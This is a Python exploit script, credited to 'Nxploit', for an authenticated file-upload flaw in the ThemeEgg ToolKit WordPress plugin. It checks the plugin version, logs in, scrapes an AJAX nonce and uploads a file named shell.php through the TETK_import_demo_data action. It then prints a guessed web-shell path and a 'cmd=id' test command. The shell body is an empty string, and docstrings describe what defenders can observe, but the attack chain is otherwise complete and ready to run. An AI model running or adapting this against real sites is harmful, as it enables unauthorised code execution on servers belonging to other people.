"""Proof-of-concept for an authenticated file-upload weakness in the ThemeEgg
ToolKit WordPress plugin (stable tag at or below 1.2.9 per the check below).

Flow: read the plugin version from ``readme.txt``, log in with the supplied
credentials, scrape the plugin settings page for its AJAX nonce, then send a
multipart POST to ``wp-admin/admin-ajax.php`` with ``action=TETK_import_demo_data``
and a ``customizer_file`` part named ``shell.php``.  ``shell_code`` is the
empty string in this listing, so the part carries no content, and the script
never fetches the path it prints afterwards.

Observable trace from a defender's side: an ``admin-ajax.php`` request whose
``action`` is ``TETK_import_demo_data`` and whose multipart part uses a
``.php`` filename, preceded by a read of
``wp-content/plugins/themeegg-toolkit/readme.txt`` and a login, all with the
fixed ``User-Agent: Mozilla/5.0`` header used throughout this file.
"""
import argparse
import re
import time

import requests
from bs4 import BeautifulSoup

#by Nxploit | Khaled Alenazi

# TLS certificate verification is switched off for the shared session here and
# again with verify=False on individual calls below; the urllib3 warning that
# would normally flag this is silenced.
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False


def display_banner() -> None:
    """Print the ASCII-art banner and author line to stdout."""
    banner = """
..######..##.....##.########..........#######....#####....#######..########..........#######...#######...#######.....##...########
.##....##.##.....##.##...............##.....##..##...##..##.....##.##...............##.....##.##.....##.##.....##..####...##......
.##.......##.....##.##......................##.##.....##........##.##......................##.##.....##.##.....##....##...##......
.##.......##.....##.######...#######..#######..##.....##..#######..#######..#######..#######...#######...########....##...#######.
.##........##...##..##...............##........##.....##.##..............##.........##........##.....##........##....##.........##
.##....##...##.##...##...............##.........##...##..##........##....##.........##........##.....##.##.....##....##...##....##
..######.....###....########.........#########...#####...#########..######..........#########..#######...#######...######..######.

Exploit by : Khaled Alenazi ,Nxploit
"""
    print(banner)


def check_version(url: str) -> bool:
    """Return True when the plugin's readme.txt reports a stable tag at or below 1.2.9.

    Fetches ``<url>/wp-content/plugins/themeegg-toolkit/readme.txt`` through
    the module-level ``requests`` API rather than the shared ``session``, so
    this request carries no cookies.  Any non-200 status, or a readme without
    a three-component ``Stable tag``, is reported as "not vulnerable".

    The comparison ``match.group(1) <= "1.2.9"`` is a plain string comparison,
    not a version comparison: e.g. "1.2.10" and "1.10.0" both sort *below*
    "1.2.9" lexicographically, so the result is only an approximation.
    A 3-second pause follows a positive match.
    """
    version_url = f"{url}/wp-content/plugins/themeegg-toolkit/readme.txt"
    response = requests.get(version_url, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    if response.status_code == 200:
        match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text)
        # NOTE: lexicographic str comparison, not semantic versioning (see docstring).
        if match and match.group(1) <= "1.2.9":
            print(f"[+] Vulnerable version detected: {match.group(1)}")
            time.sleep(3)
            return True
    print("[-] The target does not appear to be vulnerable.")
    return False


def login(url: str, username: str, password: str, session: requests.Session) -> bool:
    """POST the credentials to wp-login.php and report whether a login cookie appeared.

    Success is inferred only from the session's cookie jar: any cookie whose
    name contains ``wordpress_logged_in``.  The HTTP status and response body
    are not inspected (``response`` is assigned but never read).  The
    ``session`` parameter shadows the module-level ``session``; callers in this
    file pass that same object.
    """
    login_url = f"{url}/wp-login.php"
    login_data = {"log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In"}
    response = session.post(login_url, data=login_data, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)


def get_security_nonce(url: str, session: requests.Session) -> str | None:
    """Scrape the plugin settings page for its ``ajax_nonce`` value.

    Requests ``wp-admin/themes.php?page=themeegg-toolkit`` with the logged-in
    session and searches every ``<script>`` element for ``"ajax_nonce":"..."``.
    Returns the first match, or None when no script contains one — including
    the case where the page was not served at all, since the status code is
    not checked.
    """
    settings_page = session.get(f"{url}/wp-admin/themes.php?page=themeegg-toolkit", headers={"User-Agent": "Mozilla/5.0"})
    soup = BeautifulSoup(settings_page.text, "html.parser")
    for script in soup.find_all("script"):
        match = re.search(r'"ajax_nonce":"(\w+)"', script.text)
        if match:
            return match.group(1)
    return None


def exploit(url: str, username: str, password: str) -> None:
    """Run the chain: version check, login, nonce scrape, multipart upload.

    Each stage prints a status line and returns early on failure.  The upload
    is a multipart POST to ``wp-admin/admin-ajax.php`` with
    ``action=TETK_import_demo_data``, the scraped nonce in ``security``, and a
    ``customizer_file`` part named ``shell.php`` whose body is ``shell_code``
    — the empty string in this listing.

    Success is judged solely on an HTTP 200, which by itself does not confirm
    that a file was written.  The printed location is a hard-coded guess
    (``uploads/2025/03/``, i.e. a fixed year/month directory) and is never
    requested, hence the "Potential" wording in the output.
    """
    if not check_version(url):
        return
    if login(url, username, password, session):
        print("[+] Logged in successfully.")
    else:
        print("[-] Failed to log in.")
        return
    nonce_value = get_security_nonce(url, session)
    if not nonce_value:
        print("[-] Failed to extract security nonce.")
        return
    print(f"[+] Found security nonce: {nonce_value}")
    # Empty payload: the multipart part below has a filename and MIME type but no body.
    shell_code = ""
    files = {
        "action": (None, "TETK_import_demo_data"),
        "security": (None, nonce_value),
        "customizer_file": ("shell.php", shell_code, "application/x-php")
    }
    upload_url = f"{url}/wp-admin/admin-ajax.php"
    print("[*] Uploading Web Shell...")
    response = session.post(upload_url, files=files, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    time.sleep(3)
    # Only the status code is checked; the response body is not parsed.
    if response.status_code == 200:
        print("[+] Web Shell uploaded successfully!")
        # Fixed year/month path — not derived from the server's response.
        shell_path = f"{url}/wp-content/uploads/2025/03/shell.php"
        print(f"[+] Potential Web Shell location: {shell_path}")
        print(f"[*] Test command: {shell_path}?cmd=id")
    else:
        print("[-] File upload failed. Check if you have sufficient privileges or if there are additional protections.")


if __name__ == "__main__":
    display_banner()
    # Credentials are taken as command-line arguments and therefore end up in
    # shell history and process listings.
    parser = argparse.ArgumentParser(description="Exploit for ThemeEgg ToolKit File Upload Vulnerability")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    args = parser.parse_args()
    exploit(args.url, args.username, args.password)